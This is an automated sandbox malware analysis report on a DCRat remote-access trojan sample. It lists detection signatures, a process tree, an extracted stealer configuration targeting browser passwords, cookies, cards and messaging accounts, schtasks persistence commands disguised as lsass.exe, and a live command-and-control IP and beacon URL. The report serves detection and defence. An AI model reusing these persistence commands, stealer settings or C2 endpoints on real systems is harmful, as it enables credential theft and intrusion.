Loading ...

Play interactive tourEdit tour

Windows Analysis Report 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Overview

General Information

Sample Name:9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
Analysis ID:553369
MD5:a4d367f98a1fa3e594af0875379bda39
SHA1:a82d6bafcc260138eb11b4a511ff6f3e80441ce3
SHA256:9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b8f3040eb8f3d29ef149
Tags:DCRatexe
Infos:

Most interesting Screenshot:

Detection

DCRat
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Antivirus detection for dropped file
Yara detected DCRat
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Creates processes via WMI
Machine Learning detection for sample
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
File is packed with WinRar
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe" MD5: A4D367F98A1FA3E594AF0875379BDA39)
    • wscript.exe (PID: 6628 cmdline: "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • cmd.exe (PID: 5360 cmdline: C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • schtasks.exe (PID: 2572 cmdline: schtasks.exe /create /tn "wjIuhVBtfHXnMCZlWDoj" /sc ONLOGON /tr "'C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • wjIuhVBtfHXnMCZlWDoj.exe (PID: 6632 cmdline: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe MD5: 4E66AE5C311A1AADC1241790C112525F)
  • schtasks.exe (PID: 6560 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 6276 cmdline: schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • lsass.exe (PID: 2936 cmdline: C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe MD5: 4E66AE5C311A1AADC1241790C112525F)
  • wjIuhVBtfHXnMCZlWDoj.exe (PID: 1744 cmdline: "C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe" MD5: 4E66AE5C311A1AADC1241790C112525F)
  • lsass.exe (PID: 1680 cmdline: "C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe" MD5: 4E66AE5C311A1AADC1241790C112525F)
  • cleanup

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"u\":\"#\",\"d\":\"(\",\"M\":\"<\",\"2\":\"%\",\"D\":\">\",\"8\":\"_\",\"9\":\"~\",\"O\":\"&\",\"I\":\"|\",\"w\":\")\",\"X\":\"!\",\"1\":\"-\",\"x\":\",\",\"y\":\".\",\"Q\":\";\",\"A\":\" \",\"p\":\"^\",\"Y\":\"@\",\"W\":\"`\",\"G\":\"*\",\"i\":\"$\",\"Z\":\"+\"}", "PCRT": "{\"C\":\")\",\"F\":\"*\",\"Q\":\"!\",\"2\":\"@\",\"V\":\" \",\"B\":\"^\",\"U\":\"$\",\"T\":\"<\",\"o\":\"&\",\"R\":\"+\",\"d\":\".\",\"c\":\";\",\"O\":\"%\",\"p\":\">\",\"E\":\"-\",\"S\":\",\",\"l\":\"~\",\"D\":\"_\",\"3\":\"|\",\"H\":\"(\",\"G\":\"#\",\"1\":\"`\"}", "TAG": "", "MUTEX": "DCR_MUTEX-OkjwC4qi8XjmDi2c70LT", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": false, "ASP": "%UsersFolder% - Fast", "AD": false}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 11 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: WSF/JSE/JS/VBA/VBE File ExecutionShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe" , ParentImage: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, ParentProcessId: 6580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe" , ProcessId: 6628

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 0000000A.00000002.726915147.0000000002541000.00000004.00000001.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"u\":\"#\",\"d\":\"(\",\"M\":\"<\",\"2\":\"%\",\"D\":\">\",\"8\":\"_\",\"9\":\"~\",\"O\":\"&\",\"I\":\"|\",\"w\":\")\",\"X\":\"!\",\"1\":\"-\",\"x\":\",\",\"y\":\".\",\"Q\":\";\",\"A\":\" \",\"p\":\"^\",\"Y\":\"@\",\"W\":\"`\",\"G\":\"*\",\"i\":\"$\",\"Z\":\"+\"}", "PCRT": "{\"C\":\")\",\"F\":\"*\",\"Q\":\"!\",\"2\":\"@\",\"V\":\" \",\"B\":\"^\",\"U\":\"$\",\"T\":\"<\",\"o\":\"&\",\"R\":\"+\",\"d\":\".\",\"c\":\";\",\"O\":\"%\",\"p\":\">\",\"E\":\"-\",\"S\":\",\",\"l\":\"~\",\"D\":\"_\",\"3\":\"|\",\"H\":\"(\",\"G\":\"#\",\"1\":\"`\"}", "TAG": "", "MUTEX": "DCR_MUTEX-OkjwC4qi8XjmDi2c70LT", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": false, "ASP": "%UsersFolder% - Fast", "AD": false}
            Antivirus detection for dropped fileShow sources
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeAvira: detection malicious, Label: HEUR/AGEN.1141820
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeAvira: detection malicious, Label: HEUR/AGEN.1141820
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeAvira: detection malicious, Label: HEUR/AGEN.1141820
            Source: C:\Windows\System32\umdmxfrm\backgroundTaskHost.exeAvira: detection malicious, Label: HEUR/AGEN.1141820
            Machine Learning detection for sampleShow sources
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped fileShow sources
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeJoe Sandbox ML: detected
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeJoe Sandbox ML: detected
            Source: C:\Windows\System32\umdmxfrm\backgroundTaskHost.exeJoe Sandbox ML: detected
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0101B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0102AAA8 FindFirstFileExA,
            Source: global trafficHTTP traffic detected: GET /7/Universal/HttpFlower1Track/BigloadpacketCdn/localSecure/eternalPipebigloadsqldownloads.php?8QZesf4BjPtJwMxRC1=1cEHj6AVuwEa1lJXnITm&E9EC=WXKg&p6jKF4I=isJKPez2imzKItPhxc9FejmLNj&ad86a6d64cd9a9c991d6459f2f76c879=2c265b3bebbb4f72fb0a4abcd42fd52d&7ff5ed2a3db2907b96c3c5c975e1934b=wYiFDMykTM1ATZzUGZhVGN2cjYlFmM0YzNwEGMjNGMiRzYhJDZ1IzM&8QZesf4BjPtJwMxRC1=1cEHj6AVuwEa1lJXnITm&E9EC=WXKg&p6jKF4I=isJKPez2imzKItPhxc9FejmLNj HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 47.254.235.229Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 47.254.235.229
            Source: unknownTCP traffic detected without corresponding DNS query: 47.254.235.229
            Source: unknownTCP traffic detected without corresponding DNS query: 47.254.235.229
            Source: lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmpString found in binary or memory: http://47.254.235.229
            Source: lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmpString found in binary or memory: http://47.254.235.229/7/Universal/HttpFlower1Track/BigloadpacketCdn/localSecure/
            Source: lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmp, lsass.exe, 00000014.00000002.935167405.00000000010E8000.00000004.00000001.sdmpString found in binary or memory: http://47.254.235.229/7/Universal/HttpFlower1Track/BigloadpacketCdn/localSecure/eternalPipebigloadsq
            Source: lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmpString found in binary or memory: http://47.254.235.229x
            Source: lsass.exe, 00000014.00000002.935090036.00000000010A8000.00000004.00000001.sdmpString found in binary or memory: http://ctl254.235.229/7/Universal/HttpFlower1Track/BigloadpacketCdn/localSecure/eternalPipebigloadsq
            Source: refhostperfdllCommonsessionnetsvc.exe, 00000007.00000002.712103997.0000000003250000.00000004.00000001.sdmp, lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: lsass.exe, 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
            Source: global trafficHTTP traffic detected: GET /7/Universal/HttpFlower1Track/BigloadpacketCdn/localSecure/eternalPipebigloadsqldownloads.php?8QZesf4BjPtJwMxRC1=1cEHj6AVuwEa1lJXnITm&E9EC=WXKg&p6jKF4I=isJKPez2imzKItPhxc9FejmLNj&ad86a6d64cd9a9c991d6459f2f76c879=2c265b3bebbb4f72fb0a4abcd42fd52d&7ff5ed2a3db2907b96c3c5c975e1934b=wYiFDMykTM1ATZzUGZhVGN2cjYlFmM0YzNwEGMjNGMiRzYhJDZ1IzM&8QZesf4BjPtJwMxRC1=1cEHj6AVuwEa1lJXnITm&E9EC=WXKg&p6jKF4I=isJKPez2imzKItPhxc9FejmLNj HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 47.254.235.229Connection: Keep-Alive
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000014.00000002.935944649.0000000013028000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
            Source: 00000007.00000002.714469777.0000000013283000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
            Source: Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 744, type: MEMORYSTRMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
            Source: Process Memory Space: lsass.exe PID: 1680, type: MEMORYSTRMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeFile created: C:\Windows\System32\umdmxfrmJump to behavior
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100857B
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01031194
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0102D00E
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100407E
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_010170BF
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01003281
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100E2A0
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_010202F6
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0102070E
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0102473A
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_010137C1
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_010027E8
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01016646
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100F968
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01024969
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100E8A0
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01020B43
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0102CB60
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01013A3C
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01016A7B
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100ED14
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01013D6D
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0101FDFA
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01015C77
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01005F3C
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01020F78
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100BE13
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100DE6C
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeCode function: 7_2_00007FFA362648A2
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeCode function: 7_2_00007FFA362649A2
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: String function: 0101E28C appears 35 times
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: String function: 0101E360 appears 52 times
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: String function: 0101ED00 appears 31 times
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669450664.000000000340E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669450664.000000000340E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000002.670220738.000000000342D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000002.670220738.000000000342D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669465613.000000000342C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669465613.000000000342C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669430120.0000000003405000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, 00000000.00000003.669430120.0000000003405000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeSection loaded: dxgidebug.dll
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeSection loaded: policymanager.dll
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeFile read: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeJump to behavior
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe "C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe"
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wjIuhVBtfHXnMCZlWDoj" /sc ONLOGON /tr "'C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe'" /rl HIGHEST /f
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe "C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe"
            Source: unknownProcess created: C:\Users\user\Pictures\Camera Roll\lsass.exe C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe
            Source: unknownProcess created: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe "C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe"
            Source: unknownProcess created: C:\Users\user\Pictures\Camera Roll\lsass.exe "C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe"
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe "C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe"
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
